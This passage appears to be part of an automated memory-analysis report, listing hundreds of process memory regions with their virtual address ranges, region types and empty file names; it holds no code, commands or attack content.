0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9603 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9604 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9605 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9606 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9607 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9608 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9609 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9610 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9611 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9612 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9613 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9614 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
9615 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9616 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9617 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9618 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9619 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9620 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9621 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9622 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9623 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9624 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9625 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9626 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9627 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 
"" Region: id = 9628 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9629 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9630 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9631 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9632 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9633 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9634 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9635 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9636 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9637 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9638 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9639 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9640 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9641 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9642 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9643 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9644 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9645 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9646 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9647 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9648 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9649 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9650 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9651 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9657 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9658 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9659 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9660 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9661 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9662 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9663 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9664 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9665 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9666 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9667 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9668 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9669 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9670 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9671 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9673 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9674 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9675 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9676 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9677 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9678 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9679 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9680 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9681 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9682 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9683 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9684 start_va = 0x2a0000 end_va = 
0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9685 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9686 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9687 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9688 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9695 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9696 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9697 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9698 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9699 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9700 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9701 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9702 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9703 start_va = 
0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9704 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9705 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9706 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9729 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9730 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9731 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9732 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9738 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9739 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9740 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9741 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9742 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9743 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9744 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9745 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9746 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9747 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9748 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9749 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9750 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 9751 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9752 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9753 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9754 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9756 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9765 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9782 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9783 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9784 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9785 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9798 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9799 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9800 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9805 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9815 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9828 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9841 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9842 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9843 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9844 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9845 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9846 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9847 
